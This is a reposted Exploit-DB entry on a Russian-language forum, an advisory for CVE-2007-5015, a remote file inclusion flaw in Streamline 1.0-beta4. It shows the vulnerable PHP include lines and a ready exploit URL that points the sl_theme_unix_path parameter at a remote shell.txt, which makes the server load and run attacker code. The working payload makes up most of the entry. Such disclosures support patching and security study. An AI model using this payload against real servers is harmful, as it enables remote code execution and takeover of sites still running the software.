- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4430
- Проверка EDB
-
- Пройдено
- Автор
- BINGZA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5015
- Дата публикации
- 2007-09-19
Код:
Vulnerability Type: Remote File Inclusion
Vulnerable file: /streamline-1.0-beta4/src/core/theme/includes/account_footer.php
Exploit URL: http://localhost/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: sl_theme_unix_path
Line number: 2
Lines:
----------------------------------------------
<?
require_once( $sl_theme_unix_path."/account/footer.php" );
require_once( $sl_theme_unix_path."/common/footer.php" );
----------------------------------------------
GrEeTs To sHaDoW sEcUrItY TeAm & str0ke
FoUnD By BiNgZa
DoRk: :(
[email protected]
# milw0rm.com [2007-09-19]- Источник
- www.exploit-db.com
